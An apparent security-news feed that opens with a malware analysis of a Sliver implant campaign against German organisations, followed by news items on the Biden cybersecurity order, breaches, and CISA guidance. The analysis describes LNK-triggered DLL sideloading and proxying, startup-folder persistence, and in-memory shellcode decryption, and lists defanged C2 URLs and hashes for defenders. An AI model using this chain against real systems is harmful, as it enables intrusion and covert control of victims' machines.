Sliver Implant Targets German Entities with DLL Sideloading and Proxying TechniquesKey Takeaways Cyble Research and Intelligence Labs (CRIL) has identified an ongoing cyberattack - targeting organizations in Germany. The attack is initiated through a deceptive LNK file embedded within an archive. When executed by an unsuspecting user, this LNK file triggers cmd.exe to copy and run wksprt.exe, a legitimate executable. This executable sideloads a malicious DLL that employs DLL proxying, ensuring the host application continues to operate seamlessly while executing malicious shellcode in the background. The shellcode ultimately decrypts and executes the final payload: Sliver, a well-known open-source Red Team/adversary emulation framework. Once deployed, Sliver functions as an implant, enabling threat actors to establish communication with the compromised system and conduct further malicious operations, thereby enhancing their control over the infected network. Overview Cyble Research & Intelligence Labs (CRIL) recently identified an ongoing campaign involving an archive file containing a deceptive LNK file. While the initial infection vector remains unclear, this attack is likely initiated via spear-phishing email. The archive file ""Homeoffice-Vereinbarung-2025.7z,"" once extracted, contains a shortcut (.LNK) file along with several other components, including legitimate executables (DLL and EXE files), a malicious DLL file, an encrypted DAT file, and a decoy PDF. Interestingly, the creation times of most files in the archive are about a year old, with only the lure document being recently created. This suggests that the Threat Actor (TA) has not updated their core components, opting instead to introduce a new lure document to maintain the campaign''s relevance. Upon execution, the LNK file triggers the opening of a decoy document, masquerading as a Home Office Agreement. This document serves as a lure to deceive the user. 
Concurrently, the LNK file also executes a legitimate executable, which subsequently performs DLL sideloading. The legitimate executable loads the malicious DLL, which is designed to retrieve and decrypt the shellcode from the DAT file stored in the same extracted archive. This entire process occurs entirely in memory, enabling the attack to evade detection by security products. The shellcode is designed to decrypt and execute an embedded payload, a Sliver implant—an open-source red teaming and command and control framework employed by the TA for further malicious actions. Upon execution, the implant establishes connections to specific remote servers/endpoints, enabling the TA to conduct additional malicious operations on the victim''s system. The figure below provides an overview of the infection process. Figure 1 - Infection chain Technical Details The attack begins once the victim extracts an archive file, likely delivered via an email attachment, containing several files: IPHLPAPI.dll – malicious DLL file IPHLPLAPI.dll – renamed legitimate IPHLPAPI.DLL ccache.dat – Contains Encrypted Shellcode wksprt.lnk - Shortcut file to load wksprt file 00_Homeoffice-Vereinbarung-2025.pdf – Lure document Homeoffice-Vereinbarung-2025.pdf.lnk – Main shortcut file However, only Homeoffice-Vereinbarung-2025.pdf.lnk, disguised as a PDF, is visible, while the other files remain hidden. When the user runs this LNK file, it triggers cmd.exe to execute a series of commands, copying files to specific directories and performing additional tasks. The image below shows the command embedded in the LNK file. Figure 2 - Contents of the .LNK file Following the execution of the LNK file, a directory named “InteI” is created within the user''s local app data folder (%localappdata%\InteI). A legitimate Windows file, wksprt.exe, from C:\Windows\System32 is then copied into this newly created InteI directory. 
Subsequently, the hidden files IPHLPAPI.dll, IPHLPLAPI.dll, and ccache.dat are copied into the “InteI” directory, with their hidden attributes preserved. To establish persistence on the victim''s machine, wksprt.lnk, one of the files from the extracted folder, is copied to the Startup folder (%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\). This LNK file is designed to execute wksprt.exe, which has been copied to the “InteI” directory, ensuring that the executable runs automatically upon system startup. Figure 3 - Command line parameters of LNK file Before the final step, the decoy file “00_Homeoffice-Vereinbarung-2025.pdf” is executed to maintain the appearance of a legitimate document being opened. Figure 4 - Lure document The lure document is a Home Office Agreement (Homeoffice-Vereinbarung) written in German, serving as a supplementary agreement to an existing employment contract between an organization and an employee, outlining the terms for remote work. Based on the content of this lure document, we believe this campaign is designed to target individuals or organizations in Germany. Furthermore, the initial .7z file was observed to have been uploaded to VirusTotal from a German location, supporting this assessment. Finally, wksprt.exe is launched from the “InteI” directory to carry out further actions. The malicious DLL file has a very low detection rate, as shown below. Figure 5 - Low Detection rate of Malicious DLL file DLL Sideloading and DLL Proxying: The legitimate executable wksprt.exe sideloads a malicious DLL (IPHLPAPI.dll) from the current directory. The malicious IPHLPAPI.dll then loads a slightly renamed legitimate DLL (IPHLPLAPI.dll), designed to appear authentic. Both DLLs export the same functions, as shown below. 
Figure 6 - Export functions of both DLLs The malicious DLL acts as a proxy, intercepting function calls from the executable and forwarding them to the legitimate DLL, which contains the actual implementation of the function, as shown below. Figure 7 – DLL proxying The forwarding of function calls ensures that the application maintains its normal behavior while allowing the malicious DLL to execute its own code. In addition, the malicious DLL spawns a new thread to read the contents of the file ccache.dat, as shown below. Figure 8 - Reading the encrypted content from the .dat file After the ""ccache.dat"" file''s content is read, the malicious thread decrypts the malicious data. It employs the following cryptographic APIs for key generation and decryption: CryptAcquireContextW CryptCreateHash CryptHashData CryptDeriveKey CryptDecrypt The thread now copies the decrypted content to the newly allocated memory and executes it. The figure below shows the decrypted content of “ccache.dat” and the control transfer to the decrypted content. Figure 9 - Decrypted content The decrypted content is a shellcode that runs another decryption loop to retrieve the actual payload embedded within it, as shown below. Figure 10 - Final payload The shellcode is designed to execute the embedded Sliver implant—an open-source red teaming framework used for malicious purposes by the TAs. Once executed, the implant connects to the following endpoints to carry out additional activities on the victim''s system. hxxp://www.technikzwerg[.]de/auth/auth/authenticate/samples.html hxxp://www.technikzwerg[.]de/auth/auth/authenticate/samples.php Attribution While we cannot definitively attribute this campaign to any specific group at this point, the initial infection vector, stager DLL behavior, shellcode injection, and Sliver framework exhibit patterns typically associated with APT29 in past campaigns. Additionally, this group has frequently employed the DLL sideloading technique in its operations. 
However, the most recent sample analyzed introduces DLL proxying, a technique not previously observed in APT29''s campaigns. [Update 21st January - 2025]While these similarities are noteworthy, further investigation is needed before any definitive attribution can be made. Conclusion This campaign targets organizations in Germany by impersonating an employee agreement for remote working. Using this lure, the threat actors deploy a deceptive LNK file and malicious components to gain an initial foothold on the victim''s system, leading to its compromise and further exploitation. By employing advanced evasion techniques such as DLL sideloading, DLL proxying, shellcode injection, and the Sliver framework, the attackers effectively bypass traditional security measures. This multi-stage cyberattack highlights the increasing sophistication and adaptability of threat actors, underscoring the growing complexity of APT operations and the urgent need for enhanced detection and defense strategies. Yara and Sigma rules to detect this campaign are available for download from the linked Github repository. Our Recommendations The initial breach may occur via spam emails. Therefore, it’s advisable to deploy strong email filtering systems to identify and prevent the dissemination of harmful attachments. Exercise caution when handling email attachments or links, particularly those from unknown senders. Verify the sender’s identity, particularly if an email seems suspicious. Use application whitelisting to prevent unauthorized execution of LNK files and other suspicious components. Deploy Endpoint Detection and Response (EDR) solutions to identify and block malicious behaviors, such as DLL sideloading and shellcode injection. Monitor for anomalous network activities, such as unexpected outbound connections, to detect Sliver framework-related activities. 
MITRE ATT&CK® Techniques
Initial Access (TA0001) - Phishing (T1566): the archive file may be delivered through phishing or spam emails
Execution (TA0002) - Command and Scripting Interpreter (T1059): TAs abuse command and script interpreters to execute commands
Persistence (TA0003) - Registry Run Keys / Startup Folder (T1547.001): creates persistence by adding an LNK file to a startup folder
Privilege Escalation (TA0004) - Hijack Execution Flow: DLL Side-Loading (T1574.002): executes the malicious DLL via DLL sideloading
Defense Evasion (TA0005) - Obfuscated Files or Information (T1027.002): the binary includes encrypted data
Command and Control (TA0011) - Application Layer Protocol: Web Protocols (T1071.001): the implant communicates with its C&C server over HTTP
Indicators of Compromise (IOCs)
83a70162ec391fde57a9943b5270c217d63d050aae94ae3efb75de45df5298be (SHA-256) - Archive file
f778825b254682ab5746d7b547df848406bb6357a74e2966b39a5fa5eae006c2 (SHA-256) - LNK file
9b613f6942c378a447c7b75874a8fff0ef7d7fd37785fdb81b45d4e4e2d9e63d (SHA-256) - Malicious DLL
86f8a979bd887955f0491a0ed5e00de2f3fe53e6eb5856fb823115ce43b7c0ca (SHA-256) - Encrypted .dat file
References
https://lab52.io/blog/2162-2/
https://www.ncsc.gov.uk/files/Advisory%20Further%20TTPs%20associated%20with%20SVR%20cyber%20actors.pdf
https://www.ired.team/offensive-security/persistence/dll-proxying-for-persistence
The post Sliver Implant Targets German Entities with DLL Sideloading and Proxying Techniques appeared first on Cyble.
by CYBLE
2025-01-17 10:26:21
AI Takes the Center Stage in Biden’s Landmark Cybersecurity OrderOverview Outgoing U.S. President Joe Biden issued an order yesterday outlining measures to improve government cybersecurity. The lengthy order includes suggestions to improve cloud and software security by building requirements into the federal acquisition process. It also orders federal agencies to adopt a number of cybersecurity technologies and practices and takes a forward-thinking approach to AI. As the culmination of efforts that began nearly four years ago in response to the Colonial Pipeline ransomware attack, the order is also valuable as a “lessons learned” document from an Administration that has had much to deal with in four years of dramatic cybersecurity events. Cloud, Software Security Goals Biden’s final cybersecurity plan is also ambitious in its implementation timeline, as many of the initiatives would be completed within a year. The lead federal agencies would develop contract language requiring software providers to attest and validate that they use secure software development practices. Open-source software would also be included in the plans, as agencies would be given guidance on security assessments and patching, along with best practices for contributing to open-source projects. Federal government contractors would be required to follow minimum cybersecurity practices identified by NIST “when developing, maintaining, or supporting IT services or products that are provided to the Federal Government.” Cloud service providers that participate in the FedRAMP Marketplace would create “baselines with specifications and recommendations” for securely configuring cloud-based systems to protect government data. IAM, Post-Quantum Encryption Goals Federal agencies would be required to “adopt proven security practices” to include in identity and access management (IAM) practices. 
Pilot tests for commercial phishing-resistant standards such as WebAuthn would be conducted to help those authentication efforts. The Biden plan says post-quantum cryptography (PQC) – in at least a hybrid format – should be implemented “as soon as practicable upon support being provided by network security products and services already deployed” in government network architectures. The plan also requires secure management of access tokens and cryptographic keys used by cloud service providers and encryption of DNS, email, video conferencing, and instant messaging traffic. CISA would lead the development of “the technical capability to gain timely access” to data from agency EDR solutions and security operation centers (SOCs) to enable rapid threat hunting. BGP’s security flaws are also addressed, with requirements that ISPs implement routing security measures such as Route Origin Authorizations, Route Origin Validation, route leak mitigation, and source address validation. AI Cybersecurity Innovation The executive order says AI “has the potential to transform cyber defense by rapidly identifying new vulnerabilities, increasing the scale of threat detection techniques, and automating cyber defense. The Federal Government must accelerate the development and deployment of AI, explore ways to improve the cybersecurity of critical infrastructure using AI, and accelerate research at the intersection of AI and cybersecurity.” AI cybersecurity implementation would start with a pilot program on the use of AI to improve critical infrastructure security in the energy sector. That program may gauge the effectiveness of AI technologies in detecting vulnerabilities, automating patch management, and identifying malicious threats. 
The Department of Defense would start its own program on the use of “advanced AI models for cyber defense.” The order asks science and research agencies to prioritize research on AI cybersecurity that meets the following criteria: Human-AI interaction methods to assist with defensive cyber analysis AI coding security assistance, including the security of AI-generated code Designing secure AI systems Methods for “prevention, response, remediation, and recovery of cyber incidents involving AI systems.” Conclusion Biden’s cybersecurity order is the culmination of four years which began even before the Colonial Pipeline incident with the SolarWinds software supply chain attack. The order includes longer-term goals, including a three-year plan for modernizing federal information systems, networks, and practices, with a focus on zero-trust architectures, EDR capabilities, encryption, network segmentation, and phishing-resistant multi-factor authentication. The post AI Takes the Center Stage in Biden’s Landmark Cybersecurity Order appeared first on Cyble.
by CYBLE
2025-01-17 10:00:33
Mercedes-Benz Head Unit security research reportKaspersky experts analyzed the Mercedes-Benz head unit, its IPC protocols and firmware, and found new vulnerabilities via physical access.
by Securelist
2025-01-17 09:54:06
Researchers Warn of NTLMv1 Bypass in Active Directory PolicySilverfort has discovered that a misconfiguration can bypass an Active Directory Group Policy designed to disable NTLMv1, allowing…
by Hackread
2025-01-17 09:46:03
Why Enterprises Are Prioritizing Employee Experience — AgainWith the tech talent shortage, organizations are having a tough time hiring and retaining the right talent. Employee experience matters greatly.
by ITPro Today
2025-01-17 09:44:00
European Privacy Group Sues TikTok and AliExpress for Illicit Data Transfers to ChinaAustrian privacy non-profit None of Your Business (noyb) has filed complaints accusing companies like TikTok, AliExpress, SHEIN, Temu, WeChat, and Xiaomi of violating data protection regulations in the European Union by unlawfully transferring users' data to China. The advocacy group is seeking an immediate suspension of such transfers, stating the companies in question cannot shield user data
by The Hacker News
2025-01-17 09:21:32
Additional US sanctions issued to clamp down on North Korean IT worker scamThe U.S. has continued its crackdown against North Korean IT worker scams with sanctions against the country's government weapons trading office Department 53 and its Laos-based front companies Korea Osong Shipping and Chonsurim Trading Corporation and their respective leaders, as well as China-based Liaoning China Trade Industry.
by SC Media
2025-01-17 09:20:13
Recognizing Signs of Trouble in Your Kubernetes EnvironmentTraditional observability tools fall short in capturing Kubernetes'' complexity; modern solutions must go beyond metrics and logs to deliver proactive, holistic management of cloud-native environments.
by ITPro Today
2025-01-17 09:18:00
FCC enacts rule requiring telecom operators to secure networksThe agency’s declaratory ruling took effect Thursday, but the future outlook of that effort and a separate proposed rule remain uncertain under the incoming administration.
by Cybersecurity Dive
2025-01-17 09:17:50
Archana Venugopal Takes Charge as Senior VP & CISO at National Commodity ExchangeArchana Venugopal has taken to LinkedIn to announce her appointment as Senior Vice President & Chief Information Security Officer (CISO) at the National Commodity & Derivatives Exchange Limited (NCDEX). This new role positions her at the forefront of cybersecurity leadership in one of India’s leading commodity exchanges. Established in 2003, NCDEX is a professionally managed online commodity exchange with a diverse portfolio of agricultural and non-agricultural derivatives. The exchange has played a pivotal role in setting benchmarks for the derivatives segment in India. Incorporated as a public limited company on April 23, 2003, NCDEX commenced operations on December 15, 2003, under the Forward Contracts (Regulation) Act, 1952. In 2015, the exchange transitioned into a deemed recognized stock exchange under the Securities Contracts (Regulation) Act, 1956, and is regulated by the Securities and Exchange Board of India (SEBI). Archana Venugopal’s Vision for Cybersecurity at NCDEX Venugopal, an accomplished cybersecurity professional, expressed excitement about taking on this leadership role. In her LinkedIn post, she emphasized her focus on crafting strong cybersecurity strategies, enhancing digital infrastructure, ensuring compliance with evolving regulations, and fostering a culture of innovation and resilience within NCDEX’s operations. She outlined key areas of her role, which include: Identifying and mitigating emerging cyber threats. Implementing advanced security technologies to safeguard operations. Strengthening incident response capabilities to manage potential security breaches effectively. 
Working closely with the Chief Risk Officer (CRO) and the Managing Director & Chief Executive Officer (MD & CEO) of the exchange, Venugopal will ensure that NCDEX remains at the cutting edge of cybersecurity practices, essential for an organization that handles sensitive financial data and supports critical national infrastructure. A Legacy of Leadership in Cybersecurity Before joining NCDEX, Venugopal served as the Chief Information Security Officer at ESAF Bank, where she led various initiatives to secure the bank’s operations. Her career portfolio also includes leadership roles at Gulf Bank, Deloitte India, and South Indian Bank. Her extensive experience in cybersecurity and financial sectors has equipped her with the expertise needed to address the unique challenges of securing commodity exchange platforms, where both physical and digital risks converge. Advocating for Diversity and Inclusion In addition to her technical expertise, Venugopal is a passionate advocate for diversity and inclusion in the technology and cybersecurity sectors. As a woman in STEM, she has experienced the challenges and rewards of breaking barriers in a male-dominated field. “I carry immense pride in being part of the growing community of women leaders driving change in these industries,” Venugopal shared in her LinkedIn announcement. “I hope my journey encourages more women to break barriers and embrace leadership roles in tech and beyond.” Venugopal plans to use her platform at NCDEX to champion greater representation of women in STEM and cybersecurity roles. She is deeply committed to mentoring aspiring professionals, particularly women, and encouraging them to explore leadership opportunities. Mentorship and Empowerment Venugopal’s dedication to mentorship is a cornerstone of her leadership philosophy. She aims to empower women in cybersecurity by fostering confidence, sharing her knowledge, and creating a supportive environment for professional growth. 
Through her efforts, she seeks to inspire the next generation of leaders to: Break barriers and challenge stereotypes. Embrace innovation and take on leadership roles in technology. Drive meaningful change in the cybersecurity landscape. By advocating for a more inclusive and equitable future in technology, Venugopal is contributing to a cultural shift that values diversity as a catalyst for innovation and resilience. A Promising Future for NCDEX Archana Venugopal’s appointment as Senior Vice President & Chief Information Security Officer at NCDEX marks a new chapter for both her career and the exchange’s cybersecurity journey. Her wealth of experience and her commitment to mentorship and diversity position her as a transformative leader in the cybersecurity industry. As she takes on this role, Venugopal’s efforts will contribute to fortifying NCDEX’s digital infrastructure, fostering innovation, and inspiring future leaders in the field of cybersecurity.
by The Cyber Express
2025-01-17 09:16:53
Misconfiguration exposes over Assist Security dataIncluded in the data exposed by the server were personally identifiable information, job application forms, Security Industry Authority cards, payroll details, TrustID validated documents, and invoices from up to two decades ago, according to independent security researcher JayeLTee.
by SC Media
2025-01-17 09:15:20
Almost 3.5M impacted by Wolf Haldenstein breachInfiltration of Wolf Haldenstein's systems facilitated the compromise of individuals' full names, Social Security numbers, employee identification numbers, medical diagnoses, and medical claim details, none of which has been misused so far, said the law office in a data breach notice detailing that investigation into the extent of the breach only concluded early last month.
by SC Media
2025-01-17 09:00:00
Cybersecurity Snapshot: CISA Lists Security Features OT Products Should Have and Publishes AI Collaboration Playbook
Shopping for OT systems? A new CISA guide outlines OT cyber features to look for. Meanwhile, the U.S. government publishes a playbook for collecting AI vulnerability data. Plus, a White House EO highlights AI security goals. And get the latest on IoT security; secure app dev; and tougher HIPAA cyber rules.
Dive into six things that are top of mind for the week ending Jan. 17.
1 - How to choose cybersecure OT products
Is your organization evaluating operational technology (OT) products for purchase? If so, a new guide from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) aims to help OT operators choose OT products designed with strong cybersecurity features.
The publication, titled “Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products,” highlights 12 cybersecurity elements that OT products should have, including:
- Support for controlling and tracking modifications to configuration settings
- Logging of all actions using open-standard logging formats
- Rigorous testing for vulnerabilities and timely provision of free and easy-to-install patches and updates
- Strong authentication methods such as role-based access control and phishing-resistant multi-factor authentication to prevent unauthorized access
- Protection of the integrity and confidentiality of data at rest and in transit
According to CISA, many OT products aren’t designed and developed securely, so they ship with security issues such as weak authentication, known vulnerabilities and insecure default settings. In fact, the agency says it’s common for hackers to target handpicked OT products instead of going after specific organizations. Thus, it’s critical for organizations, especially those in critical infrastructure sectors, to pick OT products built securely by using CISA’s “Secure by Design” principles.
“When security is not prioritized nor incorporated directly into OT products, it is difficult and costly for owners and operators to defend their OT assets against compromise,” reads the guide, published in collaboration with other U.S. and international agencies.
For more information about OT systems cybersecurity, check out these Tenable resources:
- “What is operational technology (OT)?” (guide)
- “Discover, Measure, and Minimize the Risk Posed by Your Interconnected IT/OT/IoT Environments” (on-demand webinar)
- “How To Secure All of Your Assets - IT, OT and IoT - With an Exposure Management Platform” (blog)
- “Blackbox to blueprint: The security leader’s guidebook to managing OT and IT risk” (white paper)
- “OT Security Master Class: Understanding the Key Principles, Challenges, and Solutions” (on-demand webinar)
2 - JCDC publishes playbook to collect AI security info
A new playbook published by the U.S. government aims to facilitate the collective, voluntary sharing of information among AI providers, developers and users about AI vulnerabilities and cyber incidents.
The “AI Cybersecurity Collaboration Playbook” from CISA’s Joint Cyber Defense Collaborative (JCDC) details ways in which AI community members in government and in the private sector – both in the U.S. and abroad – can collaborate to help boost AI security for everybody.
“The development of this playbook is a major milestone in our efforts to secure AI systems through active collaboration,” CISA Director Jen Easterly said in a statement.
AI systems introduce unique cybersecurity challenges which make them vulnerable to attacks including model poisoning, data manipulation and malicious inputs. “These vulnerabilities, coupled with the rapid adoption of AI systems, demand comprehensive strategies and public-private partnership to address evolving risks,” the 33-page playbook reads.
By collecting, analyzing and enriching information on AI vulnerabilities and cyber incidents, CISA would be able to help the AI community in a variety of ways, including by:
- Sharing information to improve detection and prevention of AI threats
- Exposing attackers’ tactics and infrastructure
- Identifying and notifying victims
- Generating threat advisories and intelligence reports
- Offering tailored recommendations, vulnerability management strategies and cyber defense best practices
The playbook’s target audience is operational cybersecurity professionals, including incident responders and security analysts, and its goal is to help them collaborate and share information with CISA and JCDC about AI security.
In addition, CISA also envisions organizations adopting the document’s guidance internally “to enhance their own information-sharing practices, contributing to a unified approach to AI-related threats across critical infrastructure.”
For more information about industry efforts for collaborating on AI security:
- Cloud Security Alliance’s “AI Safety Initiative”
- MITRE’s “AI Incident Sharing initiative”
- Open Worldwide Application Security Project’s “AI Exchange”
- U.S. government’s “Testing Risks of AI for National Security (TRAINS) Taskforce”
3 - New White House cybersecurity EO includes AI requirements
The Biden Administration issued a sweeping cybersecurity executive order (EO) this week aimed at boosting U.S. cyberdefenses, and AI security is one area that it says must be strengthened.
The “Executive Order on Strengthening and Promoting Innovation in the Nation’s Cybersecurity” calls for promoting security “with and in” AI, saying it can speed up the identification of new vulnerabilities, scale up threat detection and automate cyberdefenses.
“The Federal Government must accelerate the development and deployment of AI, explore ways to improve the cybersecurity of critical infrastructure using AI, and accelerate research at the intersection of AI and cybersecurity,” the executive order reads.
Among the executive order’s requirements for AI are:
- Launching a pilot program on using AI to improve cyberdefense of critical infrastructure in the energy sector. The Secretaries of Energy, Defense and Homeland Security would be in charge of the program, in collaboration with private-sector critical infrastructure organizations. The program may include: vulnerability detection; automatic patch management; identification and categorization of anomalous and malicious activity across IT or OT systems.
- The Secretary of Defense must establish a program to use advanced AI models for cyberdefense.
- The Secretaries of Commerce, Energy and Homeland Security, and the National Science Foundation Director, must prioritize funding for their respective programs that encourage the development of “large-scale, labeled datasets needed to make progress on cyber defense research.”
- The Secretaries of Defense and Homeland Security, and the Director of National Intelligence must incorporate management of AI software vulnerabilities and compromises into their agencies’ processes and “interagency coordination mechanisms for vulnerability management.” These efforts should include incident tracking, response, reporting and sharing AI systems’ indicators of compromise.
These AI-related actions all must be completed at various dates during 2025.
The executive order covers multiple other areas. To get all the details and expert analysis, read our blog “New Cybersecurity Executive Order: What It Means for Federal Agencies” from Robert Huber, Tenable’s Chief Security Officer, Head of Research and President of Tenable Public Sector.
4 - CISA publishes secure software development best practices
Software makers interested in improving the security of their development process and of their products have fresh guidance to peruse.
As part of its “Secure by Design” program, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published cybersecurity recommendations for protecting organizations’ software development lifecycle.
The best practices are organized into two categories, software development process goals and product design goals, and include:
Software development process goals:
- Address vulnerabilities before releasing the software product, and publish a vulnerability disclosure policy.
- Separate all software development environments, including development, build and test, to reduce the lateral movement risk.
- Enforce multi-factor authentication across all software development environments.
- Securely store and transmit credentials.
Product design goals:
- Reduce entire classes of preventable vulnerabilities, such as SQL injection vulnerabilities, memory safety vulnerabilities and cross-site scripting vulnerabilities.
- Provide timely security patches to customers.
- Don’t use default passwords in your products.
- Let users know when your products are nearing end-of-life status and you will no longer provide security patches for them.
The recommendations “will help to protect the sector from cyber incidents, identify and address vulnerabilities prior to product release, improve incident response, and significantly improve software security,” reads a CISA statement.
To get more details, read the full “Information Technology (IT) Sector-Specific Goals (SSGs)” fact sheet.
For more information about secure software development:
- “CISA Tells Tech Vendors To Squash Command Injection Bugs, as OpenSSF Calls on Developers To Boost Security Skills” (Tenable)
- “Secure Development” (Software Engineering Institute, Carnegie Mellon Univ.)
- “Secure Software Development Framework” (NIST)
- “Secure development and deployment guidance” (UK NCSC)
- “OWASP Developer Guide” (Open Worldwide Application Security Project)
5 - U.S. gov’t launches security label for IoT products
To encourage the development of safer internet of things (IoT) devices for consumers, the U.S. government has introduced a new label for IoT products that meet National Institute of Standards and Technology (NIST) cybersecurity standards.
Called the U.S. Cyber Trust Mark, the label will also help U.S. consumers know which IoT products are more secure, as they shop for internet-connected ware, such as baby monitors, security cameras, refrigerators, garage door openers and thermostats.
“These devices are part of Americans’ daily lives. But Americans are worried about the rise of criminals remotely hacking into home security systems to unlock doors, or malicious attackers tapping into insecure home cameras to illicitly record conversations,” reads a White House statement.
IoT manufacturers will soon be able to seek the U.S. Cyber Trust Mark label by submitting their IoT products to accredited labs for testing. Tests will cover areas including password authentication, data protection, software updates and incident detection. IoT products that earn the label will also have a QR code that’ll link consumers to information such as:
- How to change default passwords
- How to configure the device securely
- How to access software updates and patches if they’re not delivered automatically
- The end date of the product’s support period
Participation in the U.S. Cyber Trust Mark program is voluntary for IoT manufacturers. IoT devices excluded from the program include motor vehicles, medical devices, and products used for manufacturing, industrial control and enterprise applications.
To get more details, visit the U.S. Cyber Trust Mark home page.
For more information about securing consumer IoT devices, check out resources from the IoT Security Foundation; the European Telecommunications Standards Institute; TechAccord; Internet Society; the U.K. National Cyber Security Centre; and the International Organization for Standardization (ISO).
6 - U.S. gov’t seeks tougher cybersecurity rules for health providers
Doctors, hospitals, health insurers and other healthcare organizations may face stricter cybersecurity regulations in the U.S. That’s because the U.S. government is seeking to tighten the cybersecurity requirements in the Health Insurance Portability and Accountability Act (HIPAA).
The new cybersecurity rules proposed by the Department of Health and Human Services (HHS) include:
- Develop and revise on an ongoing basis a technology asset inventory and a network map that illustrates the movement of electronic protected health information (ePHI) throughout the organization’s electronic information systems.
- Make risk analysis more specific by submitting written assessments that include: a review of the technology asset inventory and network map; reasonably anticipated threats to ePHI’s confidentiality, availability and integrity; potential vulnerabilities to the organization’s electronic information systems; a risk-level assessment of identified threats and vulnerabilities.
- Strengthen contingency planning and security incident response with steps including: draft written plans to restore certain electronic information systems and data within 72 hours; prioritize restoration by analyzing criticality of systems and tech assets; outline in writing how employees and the organization will respond to known or suspected security incidents.
- Conduct an audit at least once per year to ensure the organization’s compliance with HIPAA’s cybersecurity rules.
- With limited exceptions, encrypt ePHI at rest and in transit and require the use of multi-factor authentication.
- Conduct vulnerability scanning at least every six months, and penetration testing at least once a year.
For more details about HHS’ new proposed HIPAA cybersecurity rules and to submit public comments about them, go to the Federal Register’s “HIPAA Security Rule To Strengthen the Cybersecurity of Electronic Protected Health Information” page. The comment period ends on March 7, 2025.
by Tenable
2025-01-17 06:58:35
BlackSuit Ransomware Group: What Have Changed After Royal RansomwareThe BlackSuit ransomware group, a successor to the infamous Royal ransomware, has rapidly established itself as a prominent cyber threat since its emergence in mid-2023. Leveraging advanced tactics, techniques, and procedures (TTPs), BlackSuit employs a multifaceted approach that includes phishing, RDP exploitation, and double extortion to target high-value organizations worldwide. With over $500 million in ransom demands and attacks on industries ranging from education to automotive, BlackSuit showcases evolving ransomware capabilities.
by Picus Security
2025-01-17 04:00:00
Russian APT Phishes Kazakh Gov't for Strategic IntelA highly targeted cyber-intelligence campaign adds fuel to the increasingly complex relationship between the two former Soviet states.
by Dark Reading
2025-01-17 02:18:00
The complete list of Q4 2024 releases and updates on HTB Enterprise PlatformBuilding on the feedback from our 3.2M+ cybersecurity professionals and addressing industry challenges, we’re thrilled to share the latest Hack The Box updates from the past three months!
by Hack The Box Blog
2025-01-17 00:30:13
Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated Jan. 17)CVE-2025-0282 and CVE-2025-0283 affect multiple Ivanti products. This threat brief covers attack scope, including details from an incident response case. The post Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated Jan. 17) appeared first on Unit 42.
by Palo Alto Networks - Unit42
2025-01-17 00:14:45
Hackers Likely Stole FBI Call Logs From AT&T That Could Compromise InformantsA breach of AT&T that exposed “nearly all” of the company’s customers may have included records related to confidential FBI sources, potentially explaining the bureau’s new embrace of end-to-end encryption.
by WIRED Security News
2025-01-16 23:52:14
Biden's Cybersecurity EO Leaves Trump a Comprehensive Blueprint for DefenseNew order mandates securing the federal software supply chain and communications networks, as well as deploying AI tools to protect critical infrastructure from cyberattacks — but will the Trump administration follow through?
by Dark Reading
2025-01-16 23:42:00
Russian Star Blizzard Targets WhatsApp Accounts in New Spear-Phishing CampaignThe Russian threat actor known as Star Blizzard has been linked to a new spear-phishing campaign that targets victims' WhatsApp accounts, signaling a departure from its longstanding tradecraft in a likely attempt to evade detection. "Star Blizzard's targets are most commonly related to government or diplomacy (both incumbent and former position holders), defense policy or international relations
by The Hacker News
2025-01-16 22:03:05
183M Patient Records Exposed: Fortified Health Security Releases 2025 Healthcare Cybersecurity Report
by Dark Reading
2025-01-16 21:36:00
CISA and US and International Partners Publish Guidance for OT Owners and Operators
by Dark Reading
2025-01-16 21:35:17
Reimagining Your SOC: How to Achieve Proactive Network SecurityThis blog post advises on how security teams can move to autonomous detection and investigation of novel threats, reducing alert fatigue, and enabling tailored, real-time threat response.
by Darktrace
2025-01-16 21:32:14
SEALSQ in Cooperation With WISeKey Expands Post-Quantum Footprint in Saudi Arabia
by Dark Reading
2025-01-16 21:18:48
Chinese Innovations Spawn Wave of Toll Phishing Via SMSResidents across the United States are being inundated with text messages purporting to come from toll road operators like E-ZPass, warning that recipients face fines if a delinquent toll fee remains unpaid. Researchers say the surge in SMS spam coincides with new features added to a popular commercial phishing kit sold in China that makes it simple to set up convincing lures spoofing toll road operators in multiple U.S. states.
by Krebs on Security
2025-01-16 21:14:20
FTC Orders GoDaddy to Fix Inadequate Security PracticesThe FTC claims that the Web hosting company''s security failures led to several major breaches in the past few years.
by Dark Reading
2025-01-16 20:08:53
Biden Cybersecurity Order Lays Out Ambitious Plan for Government Security

In one of his final acts in office, outgoing President Joe Biden on Thursday issued an ambitious order outlining plans to improve U.S. government cybersecurity – including demanding better security from software and cloud companies.

The lengthy Biden cybersecurity order builds on plans that began nearly four years ago in the wake of the Colonial Pipeline ransomware attack. It comes during a week when his top cybersecurity officials – including CISA officials Jen Easterly and David Mussington and U.S. cyberspace ambassador Nathaniel Fick – have been urging the incoming Trump Administration to continue the fight against cyber threats and disinformation from Russia, China and others. Mussington also cited climate change as a threat to critical infrastructure resilience.

In other last-minute moves by the Biden Administration, the U.S. held an informal UN Security Council meeting on efforts to stop the spread of spyware, and Biden himself took aim at the “tech industrial complex” and its effect on disinformation and “extreme wealth” in his farewell address on January 15.

The incoming Trump Administration’s approach to cybersecurity and other issues remains to be seen, but the Biden executive order is noteworthy for the lessons his Administration learned in four tumultuous years for cybersecurity.

Biden Cybersecurity Order Includes Software, Cloud Security

Biden’s final cybersecurity plan lays out ambitious goals – and an equally ambitious timeline, as many of the directives would be implemented within a year. NIST, CISA, the OMB, and the Federal Acquisition Regulatory Council (FAR Council) would develop contract language requiring software providers to attest and validate that they use secure software development practices.

Open source software will also be examined, with CISA, the OMB and the GSA developing “recommendations to agencies on the use of security assessments and patching of open source software and best practices for contributing to open source software projects.”

Federal government contractors would be required to “follow applicable minimum cybersecurity practices identified” by NIST “when developing, maintaining, or supporting IT services or products that are provided to the Federal Government.”

FedRAMP policies and practices would be developed for cloud service providers in the FedRAMP Marketplace to create “baselines with specifications and recommendations for agency configuration of agency cloud-based systems in order to secure Federal data based on agency requirements.”

IAM, Post-Quantum Encryption Among Biden's Goals

